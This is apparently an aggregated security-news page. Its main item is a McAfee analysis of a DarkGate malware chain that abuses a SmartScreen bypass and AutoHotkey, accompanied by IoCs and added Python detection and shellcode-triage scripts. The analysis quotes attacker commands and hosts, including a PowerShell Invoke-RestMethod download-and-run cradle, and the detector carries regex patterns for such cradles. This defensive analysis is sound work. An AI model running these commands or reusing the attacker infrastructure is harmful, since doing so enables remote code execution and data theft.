Updated The open source R programming language — popular among statisticians and data scientists for performing visualization, machine learning, and suchlike — has patched an arbitrary code execution hole that scored a preliminary CVSS severity rating of 8.8 out of 10.…
This tutorial gives an example showing how to fuzz a function out of a compiled binary using AFL's QEMU mode.
A cyber-thief who snatched tens of thousands of patients' sensitive records from a psychotherapy clinic before blackmailing them and then leaking their files online has been caged for six years and three months.…
Updated UnitedHealth CEO Andrew Witty will tell US lawmakers Wednesday the cybercriminals who hit Change Healthcare with ransomware used stolen credentials to remotely access a Citrix portal that didn't have multi-factor authentication enabled.…
A former NSA employee has been sentenced to 262 months in prison for attempting to freelance as a Russian spy.…
A 26-year-old Finnish man was sentenced to more than six years in prison today after being convicted of hacking into an online psychotherapy clinic, leaking tens of thousands of patient therapy records, and attempting to extort the clinic and patients.
On October 21, 2020, the Vastaamo Psychotherapy Center in Finland became the target of blackmail when a tormentor identified as “ransom_man” demanded payment of 40 bitcoins (~450,000 euros at the time) in return for a promise not to publish highly sensitive therapy session notes Vastaamo had exposed online.
Ransom_man announced on the dark web that he would start publishing 100 patient profiles every 24 hours. When Vastaamo declined to pay, ransom_man shifted to extorting individual patients. According to Finnish police, some 22,000 victims reported extortion attempts targeting them personally: emails that threatened to publish their therapy notes online unless they paid a 500 euro ransom.
Finnish prosecutors quickly zeroed in on a suspect: Julius “Zeekill” Kivimäki, a notorious criminal hacker convicted of committing tens of thousands of cybercrimes before he became an adult. After being charged with the attack in October 2022, Kivimäki fled the country. He was arrested four months later in France, hiding out under an assumed name and passport.
Antti Kurittu is a former criminal investigator who worked on an investigation involving Kivimäki’s use of the Zbot botnet, among other activities Kivimäki engaged in as a member of the hacker group Hack the Planet (HTP).
Kurittu said the prosecution had demanded at least seven years in jail, and that the sentence handed down was six years and three months. Kurittu said prosecutors knocked a few months off of Kivimäki’s sentence because he agreed to pay compensation to his victims, and that Kivimäki will remain in prison during any appeal process.
“I think the sentencing was as expected, knowing the Finnish judicial system,” Kurittu told KrebsOnSecurity. “As Kivimäki has not been sentenced to a non-suspended prison sentence during the last five years, he will be treated as a first-timer, his previous convictions notwithstanding.”
But because juvenile convictions in Finland don’t count towards determining whether somebody is a first-time offender, Kivimäki will end up serving approximately half of his sentence.
“This seems like a short sentence when taking into account the gravity of his actions and the life-altering consequences to thousands of people, but it’s almost the maximum the law allows for,” Kurittu said.
Kivimäki initially gained notoriety as a self-professed member of the Lizard Squad, a mainly low-skilled hacker group that specialized in DDoS attacks. But American and Finnish investigators say Kivimäki’s involvement in cybercrime dates back to at least 2008, when he was introduced to a founding member of what would soon become HTP.
Finnish police said Kivimäki also used the nicknames “Ryan”, “RyanC” and “Ryan Cleary” (Ryan Cleary was actually a member of a rival hacker group — LulzSec — who was sentenced to prison for hacking).
Kivimäki and other HTP members were involved in mass-compromising web servers using known vulnerabilities, and by 2012 Kivimäki’s alias Ryan Cleary was selling access to those servers in the form of a DDoS-for-hire service. Kivimäki was 15 years old at the time.
In 2013, investigators going through devices seized from Kivimäki found computer code that had been used to crack more than 60,000 web servers using a previously unknown vulnerability in Adobe’s ColdFusion software. KrebsOnSecurity detailed the work of HTP in September 2013, after the group compromised servers inside data brokers LexisNexis, Kroll, and Dun & Bradstreet.
The group used the same ColdFusion flaws to break into the National White Collar Crime Center (NWC3), a non-profit that provides research and investigative support to the U.S. Federal Bureau of Investigation (FBI).
As KrebsOnSecurity reported at the time, this small ColdFusion botnet of data broker servers was being controlled by the same cybercriminals who’d assumed control over SSNDOB, which operated one of the underground’s most reliable services for obtaining Social Security numbers, dates of birth and credit file information on U.S. residents.
Kivimäki was responsible for making an August 2014 bomb threat against former Sony Online Entertainment President John Smedley that grounded an American Airlines plane. Kivimäki also was involved in calling in multiple fake bomb threats and “swatting” incidents — reporting fake hostage situations at an address to prompt a heavily armed police response to that location.
Ville Tapio, the former CEO of Vastaamo, was fired and also prosecuted following the breach. Ransom_man bragged about Vastaamo’s sloppy security, noting the company had used the laughably weak username and password “root/root” to protect sensitive patient records.
Investigators later found Vastaamo had originally been hacked in 2018 and again in 2019. In April 2023, a Finnish court handed down a three-month sentence for Tapio, but that sentence was suspended because he had no previous criminal record.
The European Commission has launched formal proceedings against Meta, alleging failure to properly monitor distribution by "foreign actors" of political misinformation before June's European elections.…
Apple's grudging accommodation of European antitrust rules by allowing third-party app stores on iPhones has left users of its Safari browser exposed to potential web activity tracking.…
The FCC on Monday fined four major US telcos almost $200 million for "illegally" selling subscribers' location information to data brokers.…
Google says it stopped 2.28 million Android apps from being published in its official Play Store last year because they violated security rules.…
The U.S. Federal Communications Commission (FCC) today levied fines totaling nearly $200 million against the four major carriers — including AT&T, Sprint, T-Mobile and Verizon — for illegally sharing access to customers’ location information without consent.
The fines mark the culmination of a more than four-year investigation into the actions of the major carriers. In February 2020, the FCC put all four wireless providers on notice that their practices of sharing access to customer location data were likely violating the law.
The FCC said it found the carriers each sold access to its customers’ location information to “aggregators,” who then resold access to the information to third-party location-based service providers.
“In doing so, each carrier attempted to offload its obligations to obtain customer consent onto downstream recipients of location information, which in many instances meant that no valid customer consent was obtained,” an FCC statement on the action reads. “This initial failure was compounded when, after becoming aware that their safeguards were ineffective, the carriers continued to sell access to location information without taking reasonable measures to protect it from unauthorized access.”
The FCCβs findings against AT&T, for example, show that AT&T sold customer location data directly or indirectly to at least 88 third-party entities. The FCC found Verizon sold access to customer location data (indirectly or directly) to 67 third-party entities. Location data for Sprint customers found its way to 86 third-party entities, and to 75 third-parties in the case of T-Mobile customers.
The commission said it took action after Sen. Ron Wyden (D-Ore.) sent a letter to the FCC detailing how a company called Securus Technologies had been selling location data on customers of virtually any major mobile provider to law enforcement officials.
That same month, KrebsOnSecurity broke the news that LocationSmart — a data aggregation firm working with the major wireless carriers — had a free, unsecured demo of its service online that anyone could abuse to find the near-exact location of virtually any mobile phone in North America.
The carriers promised to “wind down” location data sharing agreements with third-party companies. But in 2019, reporting at Vice.com showed that little had changed, detailing how reporters were able to locate a test phone after paying $300 to a bounty hunter who simply bought the data through a little-known third-party service.
Sen. Wyden said no one who signed up for a cell plan thought they were giving permission for their phone company to sell a detailed record of their movements to anyone with a credit card.
“I applaud the FCC for following through on my investigation and holding these companies accountable for putting customers’ lives and privacy at risk,” Wyden said in a statement today.
The FCC fined Sprint and T-Mobile $12 million and $80 million respectively. AT&T was fined more than $57 million, while Verizon received a $47 million penalty. Still, these fines represent a tiny fraction of each carrier’s annual revenues. For example, $47 million is less than one percent of Verizon’s total wireless service revenue in 2023, which was nearly $77 billion.
The fine amounts vary because they were calculated based in part on the number of days that the carriers continued sharing customer location data after being notified that doing so was illegal (the agency also considered the number of active third-party location data sharing agreements). The FCC notes that AT&T and Verizon each took more than 320 days from the publication of the Times story to wind down their data sharing agreements; T-Mobile took 275 days; Sprint kept sharing customer location data for 386 days.
Update, 6:25 p.m. ET: Clarified that the FCC launched its investigation at the request of Sen. Wyden.
Updated Canadian pharmacy chain London Drugs closed all of its stores over the weekend until further notice following a "cybersecurity incident."…
Authored by Yashvi Shah, Lakshya Mathur and Preksha Saxena
McAfee Labs has recently uncovered a novel infection chain associated with DarkGate malware. This chain commences with an HTML-based entry point and progresses to abuse the AutoHotkey utility in its subsequent stages. DarkGate, a Remote Access Trojan (RAT) developed using Borland Delphi, has been marketed as a Malware-as-a-Service (MaaS) offering on a Russian-language cybercrime forum since at least 2018. This malicious software boasts an array of functionalities, such as process injection, file download and execution, data theft, shell command execution and keylogging, among others. Following is the spread of DarkGate observed in our telemetry over the last three months:
Figure 1: Geo-Distribution of DarkGate
Additionally, DarkGate incorporates numerous evasion tactics to circumvent detection. DarkGate notably bypassed Microsoft Defender SmartScreen, prompting Microsoft to release a patch for the underlying vulnerability.
In the previous year, CVE-2023-36025 (https://nvd.nist.gov/vuln/detail/CVE-2023-36025) was identified and subsequently patched (https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36025). CVE-2023-36025 is a vulnerability affecting Microsoft Windows Defender SmartScreen. The flaw arises from the absence of proper checks and the corresponding prompts for Internet Shortcut (.url) files. Adversaries exploit it by crafting malicious .url files that download and execute harmful scripts while evading the warning and inspection mechanisms of Windows Defender SmartScreen. This year, CVE-2024-21412 (https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21412) was identified and patched in the same way; Microsoft describes it as an “Internet Shortcut Files Security Feature Bypass Vulnerability”.
McAfee Labs has identified two distinct initial vectors carrying identical DarkGate shellcode and payload. The first vector originates from an HTML file, while the second begins with an XLS file. We will delve into each chain individually to unveil their respective mechanisms. Below is the detailed infection chain:
Figure 2: Infection Chain
The infection chain initiates with a phishing HTML page masquerading as a Word document. Users are prompted to open the document in “Cloud View” (shown in the figure below), creating a deceptive lure for unwitting individuals to interact with malicious content.
Figure 3: HTML page
Upon clicking “Cloud View,” users are prompted to grant permission to open Windows Explorer, facilitating the subsequent redirection process.
Figure 4: Prompt confirming redirection to Windows Explorer
Upon granting permission and opening Windows Explorer, users encounter a file depicted within the Windows Explorer interface. The window title prominently displays “\\onedrive.live.com,” adding a veneer of legitimacy to the purported “Cloud View” experience.
Figure 5: Share Internet Shortcut via SMB
In our investigation, we traced the phishing scheme back to its parent HTML file. On inspection, the highlighted content in the image appears to be a Base64 string stored in reverse: the page also contains a JavaScript function (shown in the figure below) that reverses strings, which suggests the encoded data is reversed before it is decoded.
Figure 6: Javascript in HTML code
On reversing and Base64-decoding the yellow-highlighted content in Figure 6, we found:
Figure 7: WebDAV share
The URL uses the “search-ms” application protocol to run a search for a file named “Report-26-2024.url”. The “crumb” parameter confines the search to the attacker’s WebDAV share, restricting its scope to that location. Additionally, the “DisplayName” element is set so that users believe the resource they are viewing belongs to the legitimate “onedrive.live.com” folder, which is what makes the deception work.
Hence, the presence of βonedrive.live.comβ in the Windows Explorer window title is a direct consequence of the deceptive manipulation within the URL structure.
The file is an Internet Shortcut (.url) file, containing the following content:
Figure 8: content of .URL file
A .url file is a plain INI-style configuration file, typically containing a “URL=” key that names the target URL. In our scenario, the URL parameter is defined as follows: URL=file://170.130.55.130/share/a/Report-26-2024.zip/Report-26-2024.vbs.
When the .url file is opened, Windows resolves the file:// target on the remote share and runs the VBScript named in the URL parameter. This gives the attacker automatic execution of the VBScript, and therefore of arbitrary commands, on the victim’s system.
CVE-2023-36025 (https://nvd.nist.gov/vuln/detail/CVE-2023-36025) concerns Microsoft Windows Defender SmartScreen failing to issue a security prompt before executing a .url file from an untrusted source. Attackers exploit it by constructing an Internet Shortcut (.url) file that sidesteps the SmartScreen protection prompt, with a script file as one component of the payload delivery. Although Microsoft has released a patch (https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36025), the flaw remains exploitable on unpatched versions of Windows.
If your system is not patched and updated, you will not see any prompt. However, if your system is updated, you will encounter a prompt like:
Figure 9: SmartScreen prompt
On allowing execution, the VBS file is dropped at C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\U4IRGC29. This file runs automatically when the .url file is opened, and we get the following process tree:
Figure 10: Process tree
Following are the command lines:
The sequence of commands begins with the execution of the VBScript file located at “C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\U4IRGC29\Report-26-2024[1].vbs”. This VBScript then uses PowerShell to execute a script fetched from the URL “withupdate.com/zuyagaoq” via the Invoke-RestMethod cmdlet. The downloaded script in turn runs the AutoHotkey utility with a script at the designated path (C:/rjtu/script.ahk). Finally, the attrib tool is used to set the hidden attribute (+h) on the directory C:/rjtu/.
Inspecting the URL “withupdate.com/zuyagaoq” directly gives a clearer picture of the infection flow:
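The command-line sequence described above (a script host spawning a PowerShell download cradle, AutoHotkey launched from a freshly created top-level directory, and attrib +h hiding that directory) is a good candidate for process-lineage detection. The script below is an added example written for this page, not McAfee’s code: it runs three rules over constructed Sysmon-style process-creation events modelled on the write-up’s description, plus a benign AutoHotkey control. The event format, the exact PowerShell argument string and the PIDs are assumptions; the paths and the URL are the ones the write-up reports.

```python
import re

# Constructed process-creation events modelled on the chain in the write-up:
# VBScript -> PowerShell Invoke-RestMethod -> AutoHotkey -> attrib +h.
# Event layout, PIDs and the exact PowerShell arguments are assumptions.
SAMPLE_EVENTS = [
    {"pid": 101, "ppid": 50, "image": "C:\\Windows\\System32\\wscript.exe",
     "cmd": '"C:\\Windows\\System32\\wscript.exe" "C:\\Users\\admin\\AppData\\Local\\Microsoft'
            '\\Windows\\INetCache\\IE\\U4IRGC29\\Report-26-2024[1].vbs"'},
    {"pid": 102, "ppid": 101, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmd": 'powershell.exe -c "Invoke-RestMethod -Uri withupdate.com/zuyagaoq | Invoke-Expression"'},
    {"pid": 103, "ppid": 102, "image": "C:\\rjtu\\AutoHotkey.exe",
     "cmd": '"C:\\rjtu\\AutoHotkey.exe" C:\\rjtu\\script.ahk'},
    {"pid": 104, "ppid": 102, "image": "C:\\Windows\\System32\\attrib.exe",
     "cmd": "attrib +h C:\\rjtu\\"},
    # Benign control: a normally installed AutoHotkey started from Explorer.
    {"pid": 201, "ppid": 10, "image": "C:\\Program Files\\AutoHotkey\\AutoHotkey.exe",
     "cmd": '"C:\\Program Files\\AutoHotkey\\AutoHotkey.exe" "C:\\Users\\admin\\Documents\\hotkeys.ahk"'},
]

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
DOWNLOAD_CRADLE = re.compile(
    r"invoke-restmethod|\birm\b|invoke-webrequest|\biwr\b|downloadstring|net\.webclient", re.I)
TRUSTED_DIRS = ("c:\\program files\\", "c:\\program files (x86)\\")
TOP_LEVEL_DIR = re.compile(r"[a-z]:\\[^\\]+\\?", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def lineage(by_pid: dict, pid: int) -> list:
    """Image basenames from a process up to its oldest ancestor in the event set."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def detect(events: list) -> list:
    """Return (pid, reason) alerts for the DarkGate-style chain."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        name = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        pname = basename(parent["image"]) if parent else ""
        # Rule 1: a script host launching a PowerShell download cradle.
        if name == "powershell.exe" and pname in SCRIPT_HOSTS and DOWNLOAD_CRADLE.search(e["cmd"]):
            alerts.append((e["pid"], "script host spawned PowerShell download cradle"))
        # Rule 2: AutoHotkey executed from outside its normal install location,
        # and/or with a script host somewhere in its ancestry.
        if name.startswith("autohotkey"):
            if not e["image"].lower().startswith(TRUSTED_DIRS):
                alerts.append((e["pid"], f"AutoHotkey run from untrusted path {e['image']}"))
            if any(a in SCRIPT_HOSTS for a in lineage(by_pid, e["pid"])):
                alerts.append((e["pid"], "AutoHotkey descends from a script host"))
        # Rule 3: attrib +h applied to a top-level directory (C:\name\).
        if name == "attrib.exe" and re.search(r"\+h\b", e["cmd"], re.I):
            target = e["cmd"].split()[-1]
            if TOP_LEVEL_DIR.fullmatch(target):
                alerts.append((e["pid"], f"attrib +h on top-level directory {target}"))
    return alerts


if __name__ == "__main__":
    for pid, reason in detect(SAMPLE_EVENTS):
        print(pid, reason)
```

Rule 2 is the durable one: the download URL and directory name will change between campaigns, but an interpreter binary dropped outside Program Files and started by a chain that began in wscript.exe is the behaviour, not an indicator.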
Figure 11: Remote Script on the C2
This URL leads to a script:
Figure 13: Remote script content
Explanation of the script:
Checking “C:/rjtu”:
Figure 14: Dropped folder
AutoHotkey is a scripting language that allows users to automate tasks on a Windows computer. It can simulate keystrokes, mouse movements, and manipulate windows and controls. By writing scripts, users can create custom shortcuts, automate repetitive tasks, and enhance productivity.
To execute an AutoHotkey script, it is passed as a parameter to the AutoHotkey executable (autohotkey.exe).
Following is the ahk script file content:
Figure 15: Content of .ahk script
The script is padded with a large number of comments; after stripping them, we get:
Figure 16: .ahk script after removing junk
This script reads the content of “test.txt” into memory, allocates a memory region in the process’s address space, writes the content of “test.txt” as hexadecimal bytes into that region, and finally calls that region as a function. In other words, the script executes instructions stored in “test.txt”.
This confirms that the shellcode resides in “test.txt”. This is how test.txt appears:
Figure 17: Content of test.txt
We analyzed the memory in use for Autohotkey.exe.
Figure 19: Memory dump of running AutoHotKey.exe same as test.txt
This is the shellcode. The first six bytes are assembly instructions:
Following the jump instruction of 0x3bf bytes, we reach the same set of instructions again:
Figure 21: Same Shellcode A after jump
This means another jump of 0x3bf bytes will be taken:
Figure 22: Same Shellcode A one more time
We encounter the same set of instructions once more; taking another jump, we reach:
Figure 23: New Shellcode B found next.
These bytes are another shellcode, and the region highlighted in yellow (in the figure below) is a PE file. The instruction pointer is not at the PE yet; this shellcode needs to be decoded first.
Figure 24: Shellcode B followed by PE file highlighted
This shellcode adds 0x71000 to the current offset and moves the instruction pointer to the new location. The current offset is 0xB3D; adding 0x71000 gives 0x71B3D. Checking 0x71B3D, we get:
Figure 25: After debugging found next Shellcode C
This is one more set of shellcode instructions. It is approximately 4KB in size and is appended at the end of the file.
Figure 26: Shellcode C directing to entry point of the PE file
Upon debugging this code, we found that at the marked “call eax” instruction, eax holds the address of the entry point of the final DarkGate payload. This instruction therefore moves the instruction pointer to the entry point of the PE file, the region marked in yellow in Figure 24.
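The walk above (a chain of relative jumps of 0x3bf bytes, then a stub, then an embedded PE whose entry point is finally reached through call eax) can be partly automated before a debugger is opened. The script below is an added example written for this page, not McAfee’s code: it decodes a test.txt-style hex dump, follows E9/EB relative jumps from offset 0 until it hits a non-jump instruction or a loop, and locates an embedded PE by finding an MZ header whose e_lfanew lands on a PE\0\0 signature, reading AddressOfEntryPoint from the optional header. The sample blob it builds is constructed (three 0x3bf jumps and a minimal PE header); its layout, offsets and entry-point RVA are assumptions and do not reproduce the real DarkGate loader.

```python
import struct


def parse_hex_text(text: str) -> bytes:
    """test.txt stores the shellcode as hex text; drop whitespace and decode."""
    return bytes.fromhex("".join(text.split()))


def follow_jumps(blob: bytes, start: int = 0, limit: int = 32) -> list:
    """Follow E9 rel32 / EB rel8 jumps from `start`, returning the offsets visited.

    Stops at the first non-jump opcode, on a loop, when the target leaves the
    blob, or after `limit` hops (so a self-jump cannot spin forever)."""
    path, ip = [start], start
    for _ in range(limit):
        op = blob[ip] if 0 <= ip < len(blob) else None
        if op == 0xE9 and ip + 5 <= len(blob):
            ip = ip + 5 + struct.unpack_from("<i", blob, ip + 1)[0]
        elif op == 0xEB and ip + 2 <= len(blob):
            ip = ip + 2 + struct.unpack_from("<b", blob, ip + 1)[0]
        else:
            break
        path.append(ip)
        if path.count(ip) > 1 or not 0 <= ip < len(blob):
            break
    return path


def find_pe(blob: bytes):
    """Locate an embedded PE: an 'MZ' whose e_lfanew points at 'PE\\0\\0'.
    Returns (mz_offset, e_lfanew) or None."""
    off = blob.find(b"MZ")
    while off != -1:
        if off + 0x40 <= len(blob):
            e_lfanew = struct.unpack_from("<I", blob, off + 0x3C)[0]
            sig = blob[off + e_lfanew: off + e_lfanew + 4]
            if 0 < e_lfanew < 0x1000 and sig == b"PE\0\0":
                return off, e_lfanew
        off = blob.find(b"MZ", off + 1)
    return None


def entry_point_rva(blob: bytes, mz_off: int, e_lfanew: int) -> int:
    """AddressOfEntryPoint: optional header starts 0x18 past the PE signature,
    and the field sits 0x10 into the optional header (PE32 and PE32+ alike)."""
    return struct.unpack_from("<I", blob, mz_off + e_lfanew + 0x18 + 0x10)[0]


def analyze(blob: bytes) -> dict:
    """Jump chain from offset 0 plus the embedded PE's location and entry RVA."""
    result = {"jump_path": follow_jumps(blob), "pe": find_pe(blob), "entry_rva": None}
    if result["pe"]:
        result["entry_rva"] = entry_point_rva(blob, *result["pe"])
    return result


def build_sample() -> bytes:
    """Constructed blob (an assumption, not the real loader): three jmp +0x3bf
    hops as in the write-up, a NOP/int3 landing stub, then a minimal PE header
    at 0xE00 with AddressOfEntryPoint = 0x1000."""
    blob = bytearray(b"\x90" * 0x1000)
    ip = 0
    for _ in range(3):
        struct.pack_into("<BI", blob, ip, 0xE9, 0x3BF)   # E9 BF 03 00 00 = jmp +0x3bf
        ip += 5 + 0x3BF
    blob[ip:ip + 2] = b"\x90\xCC"                        # landing stub: nop; int3
    pe = bytearray(0x100)
    pe[0:2] = b"MZ"
    struct.pack_into("<I", pe, 0x3C, 0x80)               # e_lfanew
    pe[0x80:0x84] = b"PE\0\0"
    struct.pack_into("<H", pe, 0x84, 0x14C)              # Machine = IMAGE_FILE_MACHINE_I386
    struct.pack_into("<H", pe, 0x98, 0x10B)              # Optional header Magic = PE32
    struct.pack_into("<I", pe, 0x98 + 0x10, 0x1000)      # AddressOfEntryPoint
    blob[0xE00:0xE00 + len(pe)] = pe
    return bytes(blob)


if __name__ == "__main__":
    info = analyze(parse_hex_text(build_sample().hex()))
    print("jump path:", [hex(o) for o in info["jump_path"]])
    print("PE at:", info["pe"] and hex(info["pe"][0]), "entry RVA:", info["entry_rva"] and hex(info["entry_rva"]))
```

On a real dump the jump follower only gets you to the decoder stub; the 0x71000 displacement and the final call eax come from code that computes its target at run time, which is why the write-up switches to a debugger at that point. The PE finder still works on the raw blob because the payload is stored unencrypted behind the stub.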
This is the final DarkGate payload which is a Delphi-compiled executable file:
Figure 27: Darkgate payload.
After this, we see network activity to the C2 site:
Figure 28: Network Communication
Figure 29: C2 IP address
The exfiltration is done to the IP address 5.252.177.207.
Persistence:
For persistence, a .lnk file is dropped in the Startup folder:
Figure 30: Persistence
Content of lnk file:
Figure 31: Content of .lnk used for persistence
The shortcut file (.lnk) drops a folder named “hakeede” in the “C:\ProgramData” directory.
Figure 32: Folder dropped in “C:\ProgramData”
Inside this folder, the same set of files is present:
Figure 33: Same set of files present in dropped folder
Again, the .ahk file is executed via Autohotkey.exe and the shellcode in test.txt is run. These files have the same SHA256 values as before, differing only in their names.
Infection from XLS:
The malicious Excel file asks the user to click “Open” to view the content properly.
Figure 34: XLS sample
Upon clicking the “Open” button, the user gets the following prompt warning them before the file is opened.
Figure 35: XLS files trying to download and run VBS file
For our analysis, we allowed the activity by clicking “OK”. This produced the following process tree:
Figure 36: Process tree from Excel file
The command lines are:
The file fetched from “103.124.106[.]237/wctaehcw” has the following content:
Figure 37: Remote script similar to previous chain
From this point onward, the infection mirrors the chain discussed above. All three files (AutoHotKey.exe, the script file and the text file) are downloaded, with identical artifacts observed throughout.
Mitigation:
Indicators of Compromise (IoCs):
| Artifact | SHA256 hash / IP address |
| --- | --- |
| HTML file | 196bb36f7d63c845afd40c5c17ce061e320d110f28ebe8c7c998b9e6b3fe1005 |
| URL file | 2b296ffc6d173594bae63d37e2831ba21a59ce385b87503710dc9ca439ed7833 |
| VBS | 038db3b838d0cd437fa530c001c9913a1320d1d7ac0fd3b35d974a806735c907 |
| autohotkey.exe | 897b0d0e64cf87ac7086241c86f757f3c94d6826f949a1f0fec9c40892c0cecb |
| AHK script | dd7a8b55e4b7dc032ea6d6aed6153bec9b5b68b45369e877bb66ba21acc81455 |
| test.txt | 4de0e0e7f23adc3dd97d498540bd8283004aa131a59ae319019ade9ddef41795 |
| DarkGate exe | 6ed1b68de55791a6534ea96e721ff6a5662f2aefff471929d23638f854a80031 |
| IP (C2) | 5.252.177.207 |
| XLS file | 1a960526c132a5293e1e02b49f43df1383bf37a0bbadd7ba7c106375c418dad4 |
| VBS (XLS chain) | 2e34908f60502ead6ad08af1554c305b88741d09e36b2c24d85fd9bac4a11d2f |
| LNK file | 10e362e18c355b9f8db9a0dbbc75cf04649606ef96743c759f03508b514ad34e |
| IP (XLS chain) | 103.124.106.237 |

Table 1: IOC table
The post The Darkgate Menace: Leveraging Autohotkey & Attempt to Evade Smartscreen appeared first on McAfee Blog.
The French government has tabled an offer to buy key assets of ailing IT giant Atos after the company late last week almost doubled its estimate of the cash it will need to stay afloat in the near future.…
Smart device manufacturers will have to play by new rules in the UK as of today, with laws coming into force to make it more difficult for cybercriminals to break into hardware such as phones and tablets.…
The UK Competition and Markets Authority (CMA) still has privacy and competition concerns about Google's Privacy Sandbox advertising toolkit, which explains why the ad giant recently again delayed its plan to drop third-party cookies in Chrome until 2025.…
Sponsored Feature As business enters the 2020s, organizations find themselves protecting fast-expanding digital estates using security concepts that are decades old.…